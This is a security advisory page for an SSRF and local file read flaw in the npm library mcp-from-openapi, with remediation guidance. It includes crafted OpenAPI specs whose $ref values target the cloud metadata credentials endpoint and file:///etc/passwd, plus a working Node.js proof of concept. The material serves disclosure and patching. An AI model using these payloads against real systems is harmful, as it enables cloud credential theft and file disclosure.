Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
4Blast Radius
ecosystem impact- 1 npm packages depend on @frontmcp/adapters (1 direct, 0 indirect)
- 10 npm packages depend on @frontmcp/sdk (9 direct, 1 indirect)
- 2 npm packages depend on mcp-from-openapi (1 direct, 1 indirect)
Ecosystem-wide dependent count for version 1.0.4 and other introduced versions.
DescriptionGitHub Advisory
Summary
The mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.
Affected Versions
<= 2.1.2 (latest)
CWE
CWE-918: Server-Side Request Forgery (SSRF)
Vulnerability Details
File: index.js lines 870-875
When OpenAPIToolGenerator.initialize() is called, it dereferences the OpenAPI document using json-schema-ref-parser:
this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(
JSON.parse(JSON.stringify(this.document))
);No options are passed to .dereference() - no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in $ref values, including:
http://andhttps://URLs (internal services, cloud metadata)file://URLs (local filesystem)
This is the default behavior of json-schema-ref-parser - it resolves all $ref pointers by fetching the referenced resource.
Exploitation
Attack 1: SSRF to internal services / cloud metadata
A malicious OpenAPI spec containing:
{
"openapi": "3.0.0",
"info": { "title": "Evil API", "version": "1.0" },
"paths": {
"/test": {
"get": {
"operationId": "getTest",
"summary": "test",
"responses": {
"200": {
"description": "OK",
"content": {
"application/json": {
"schema": {
"$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
}
}
}
}
}
}
}
}When processed by OpenAPIToolGenerator, the library fetches http://169.254.169.254/latest/meta-data/iam/security-credentials/ from the server, potentially leaking AWS IAM credentials.
Attack 2: Local file read
{
"$ref": "file:///etc/passwd"
}The ref parser reads local files and includes their contents in the dereferenced output.
Proof of Concept
const http = require('http');
const { OpenAPIToolGenerator } = require('mcp-from-openapi');
// Start attacker server to prove SSRF
const srv = http.createServer((req, res) => {
console.log(`SSRF HIT: ${req.method} ${req.url}`);
res.writeHead(200, {'Content-Type': 'application/json'});
res.end('{"type":"string"}');
});
srv.listen(9997, async () => {
const spec = {
openapi: '3.0.0',
info: { title: 'Evil', version: '1.0' },
paths: {
'/test': {
get: {
operationId: 'getTest',
summary: 'test',
responses: {
'200': {
description: 'OK',
content: {
'application/json': {
schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }
}
}
}
}
}
}
}
};
const gen = new OpenAPIToolGenerator(spec, { validate: false });
await gen.initialize();
// Output: "SSRF HIT: GET /ssrf-proof"
// The library fetched our attacker URL during $ref dereferencing.
srv.close();
});Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during initialize().
Impact
- Cloud credential theft -
$refpointing tohttp://169.254.169.254/steals AWS/GCP/Azure metadata - Internal network scanning -
$refvalues can probe internal services and ports - Local file read -
file://protocol reads arbitrary files from the server filesystem - No privileges required - attacker only needs to provide a crafted OpenAPI spec to any application using this library
Suggested Fix
Pass resolver options to dereference() that restrict which protocols and hosts are allowed:
this.dereferencedDocument = await $RefParser.dereference(
JSON.parse(JSON.stringify(this.document)),
{
resolve: {
file: false, // Disable file:// protocol
http: {
// Only allow same-origin or explicitly allowed hosts
headers: this.options.headers,
timeout: this.options.timeout,
}
}
}
);Or disable all external resolution and require all schemas to be inline:
this.dereferencedDocument = await $RefParser.dereference(
JSON.parse(JSON.stringify(this.document)),
{
resolve: { file: false, http: false, https: false }
}
);AnalysisAI
Server-Side Request Forgery in mcp-from-openapi (<= 2.1.2) allows unauthenticated remote attackers to retrieve cloud metadata credentials, scan internal networks, and read local files by providing malicious OpenAPI specifications containing $ref pointers to internal URLs (http://169.254.169.254/) or file:// paths. The library's json-schema-ref-parser fetches referenced resources without protocol or hostname restrictions during OpenAPI document initialization, enabling AWS/GCP/Azure credential theft and arbitrary file disclosure with no privileges required beyond spec submission.
Technical ContextAI
Root cause in index.js lines 870-875: OpenAPIToolGenerator.initialize() calls json-schema-ref-parser.dereference() with no resolver configuration options, accepting default behavior that fetches all http://, https://, and file:// URIs in $ref values. CWE-918 SSRF stems from absence of protocol allowlists or hostname validation during schema reference resolution.
RemediationAI
Vendor-released patch: upgrade to mcp-from-openapi version 1.0.4 or later per https://github.com/agentfront/frontmcp/releases/tag/v1.0.4. Patched version configures json-schema-ref-parser with resolver restrictions disabling file:// protocol and enforcing hostname validation for http/https $ref targets. Immediate workaround: validate and sanitize all OpenAPI specifications before processing, rejecting specs containing $ref values with non-HTTPS schemes or IP addresses. Review advisory details at https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj for mitigation guidance. No public exploit identified at time of analysis, though detailed proof-of-concept exists in vulnerability disclosure demonstrating SSRF to localhost endpoints.
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-20632
GHSA-v6ph-xcq9-qxxj